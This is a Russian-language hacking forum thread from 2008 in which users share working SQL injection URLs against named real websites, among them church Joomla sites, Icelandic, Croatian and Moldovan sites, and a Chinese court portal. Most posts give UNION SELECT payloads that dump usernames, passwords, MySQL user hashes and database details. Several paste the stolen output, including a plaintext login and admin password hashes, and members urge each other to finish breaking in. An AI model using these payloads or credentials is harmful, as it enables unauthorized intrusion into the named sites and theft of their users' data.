ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
20.06.2008, 20:31
|
|
Познающий
Регистрация: 23.04.2008
Сообщений: 39
Провел на форуме:
198086
Репутация:
135
|
|
Немольшая потборка
--
http://www.arcdi.com/trainers.php?id=-33+union+select+1,concat(username,0x3a,password),3 ,4,5+FROM+users%20--[/code]neeblee.com
http://www.neeblee.com/plaincart/index.php?c=39&p=-33+union+select+1,concat_ws(0x3,user_name,user_pas sword),3,4,5+from+tbl_user/*
--
PHP код:
/*
<v5_01> (SQL INJ) http://www.prbc.org.au/churchsite/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.choosedestiny.com/index2.php?option=com_prayercenter&task=view_reque st&id=-
1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.prbc.org.au/churchsite/index.php?option=com_prayercenter&Itemid=51/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://connectinchrist.com/component/option,com_prayercenter/Itemid,74/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.worlddayofprayeraustralia.org/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://connectinchrist.com/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.ejesus.com.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.threecordstrand.net/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.threecordstrand.net/index.php?option=com_prayercenter&Itemid=30/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.icfaustralia.org.au/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.ejesus.com.br/index.php?option=com_prayercenter&Itemid=78/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.icfaustralia.org.au/index.php?option=com_prayercenter&Itemid=41/index2.php?option=com_prayercenter&task=view_reque st&id=1+UNION+SELECT+user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.promvr.com.br/principal/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.ibbt.org.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.ibbt.org.br/index.php?option=com_prayercenter&task=view/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.rccsaopaulo.com.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.rccgoias.org.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.rccsaopaulo.com.br/index.php?option=com_prayercenter&task=subscribe&I temid=/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.rccgoias.org.br/index.php?option=com_prayercenter&task=view/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.iem.org.br/site/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.iem.org.br/site/index.php?option=com_prayercenter&Itemid=69/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://igrejabatistaagape.org.br/joomla/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://gpom.com.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://gpom.com.br/index.php?option=com_prayercenter&task=new&Itemid=/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.canaljesus.com.br/media/option,com_prayercenter/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
<v5_01> (SQL INJ) http://www.canaljesus.com.br/media/option,com_prayercenter/Itemid,45.aspx/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--
*\
|
|
|
20.06.2008, 20:28
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
sabe, почистил. спс что показал
Последний раз редактировалось gisTy; 20.06.2008 в 20:31..
|
|
|
|
20.06.2008, 21:31
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500
Репутация:
930
|
|
.is
Сегодня ужасный недохек 
Но зато отличные домены ) ir.is / fg.is / 69.is / numi.is / php.internet.is
Код:
PR - 4
http://www.acsr.be/artic_gen.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
PR - 5
http://69.is/openlink.php?id=52900+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
PR - 5
http://www.ornefni.is/n-greinar2.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
http://php.internet.is/kraftaheimar/lesa_frettina.php?id=-2187+union+select+1,2,3,4,5,6,7,8,9,10/*
http://numi.is/fullfrettir.php?id=-9+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),v ersion(),database()),8,9/*
numiuser@server2.hysir.net:4.1.20-log:numi
PR - 4
http://www.fg.is/page.php?id=-35+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4,5,6/*
fguser@localhost:4.1.20-log:fg
PR - 5
http://www.ir.is/1.3.svid.php?id=-7+union+select+concat_ws(0x3a,user(),version(),dat abase()),2,3,4/*
srr@localhost:5.0.32-Debian_7etch5-log:nam
Кто докрутит - выкладывайте ) Там много где 4М, так что подбором токо
Без дефейсов пожалуйсто )
|
|
|
|
20.06.2008, 22:18
|
|
Познающий
Регистрация: 23.03.2005
Сообщений: 40
Провел на форуме:
44404
Репутация:
13
|
|
еще одна ошибка в Limit
Код:
http://hq-films.ws/browse.php?page=0.01
кстати реально ченить с этой ошибкой сделать? |
|
|
|
21.06.2008, 00:45
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
еще чуть-чуть от меня...
PR 4
http://www.emajonline.com/index.php?action=1&extra=educators_list.php&cat_id =-53+union+select+1,2,3,4,5,concat_ws(0x3a3a,version (),user(),database()),7/*
4.1.22-standard::emajo2_webuser@localhost::emajo2_emaj
PR 4
http://www.queerzagreb.org/new/index.php?page=article_en&cat_id=15&id=-121+union+select+1,2,3,4,unhex(hex(concat_ws(0x3a3 a,version(),user(),database()))),6,7,8,9,10,11,12/*
4.1.11-Debian_4sarge7-log::qu2zg@localhost::queer2
PR 4
http://www.trenerski-forum.hr/index.php?page=category&cat_id=4+union+select+1,un hex(hex(concat_ws(0x3a3a,version(),user(),database ()))),3,4,5,6,7,8,9,10,11/*&lang=hr
4.1.11-Debian_4sarge7-log::trenersk@localhost::trenersk
PR 2
http://www.hotel-drava.com/index.php?page=article&id=21+union+select+1,unhex( hex(concat_ws(0x3a3a,version(),user(),database())) ),3,4,5,6,7,8,9,10,11,12/*
4.1.20::hdrava@localhost::content
http://www.mrkzapresic.hr/index.php?page=article&id=5+union+select+1,unhex(h ex(concat_ws(0x3a3a,version(),user(),database()))) ,3,4,5,6,7,8,9,10,11,12,13,14/*
4.1.11-Debian_4sarge7-log::mrkzapresic@localhost::mrkzapr
Последний раз редактировалось gisTy; 21.06.2008 в 00:56..
|
|
|
|
21.06.2008, 02:29
|
|
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614
Репутация:
1223
|
|
Раскрутил скулю бальтозара, не без помощи суча 
http://pipe.com.ua/j2me/view.php?m_id=-2+union+select+1,2,concat_ws(0x3a,l_name,l_passwd) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32+from+amgrit.login+ limit+0,1/*
ray:muter342 |
|
|
|
21.06.2008, 14:56
|
|
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049
Репутация:
705
|
|
chinacourt.org
http://en.chinacourt.org/public/detail.php?id=999+union+select+1,concat(user,char( 58),password,char(58),File_priv,char(58),host)+fro m+mysql.user
5.0.51a-log:dbuser@localhost:fy_en
root::Y:localhost
zq16167:22f421104e6fdb11:N:192.168.100.%
dbuser:0a9aadd73a743bd7:Y:localhost
dadmin:4f73678d19210e5a:N:192.168.100.23
polluser:5f33fe201e0b7703:N:localhost
CHARACTER_SETS
COLLATIONS
VIEWS
announce
announce_bills
announce_cancel_cause
announce_charge
announce_courts
announce_debtors
announce_status
auction
ad_click
ad_click_detail
area
article
article_court
article_keyword
article_location
article_log
article_subject
click_count
comment
control
court
court_level
court_reg_class
direct
images
location_img
lszx_charge
lszx_config
lszx_domain
lszx_image
lszx_organization
lszx_province
lszx_search
lszx_specialty
manager id
enable_flag
types
account
password
location
reg_date
name 1:1:0:root:mt28xqfch:0000000000:2002-01-18 16:51:12
3:0:2:newsmanager:gsdlj:0000000000:2002-05-29 10:02:54
manager_log
obj
obj_class
obj_info
obj_pic
subject
subject_kind
video
vote_data мля нифига не понимаю по китайски)
|
|
|
|
21.06.2008, 17:52
|
|
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614
Репутация:
1223
|
|
http://www.realty.lv/?lang=ru&id=2&category_id=1&news_id=-4868'+union+select+1,2,3,login,pass,6,7,8,9,0,1+fr om+user+where+id=1/*
До админки добратся не получилось
|
|
|
|
21.06.2008, 18:34
|
|
Новичок
Регистрация: 11.05.2008
Сообщений: 12
Провел на форуме:
36048
Репутация:
5
|
|
Код:
http://www.aif.md/index.php?id=-52+union+select+1,2,version(),4,5,6,7,8/*
Код:
http://www.vedomosti.md/index.php?doc=6&ID=-417+union+select+1,2,3,4,5,6,7,version()/*
Код:
http://www.studii.md/work_view_vacancy_detail.php?id=-3055+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16/*
Код:
http://www.statistica.md/news.php?lang=ru&id=-173+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11/*
Код:
http://wwwta.md/vacancies/vacancy/index.php?id=-7052+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
Код:
http://www.ipoteka.md/ro/law.php?ID=-5+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16/*
Код:
http://www.aquasystems.md/readarticle.php?id=-3+union+select+1,2,table_name+from+information_schema.tables/*
.мд пад апстрелам ) |
|
|
|
21.06.2008, 18:38
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500
Репутация:
930
|
|
Научи такие скули находить
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид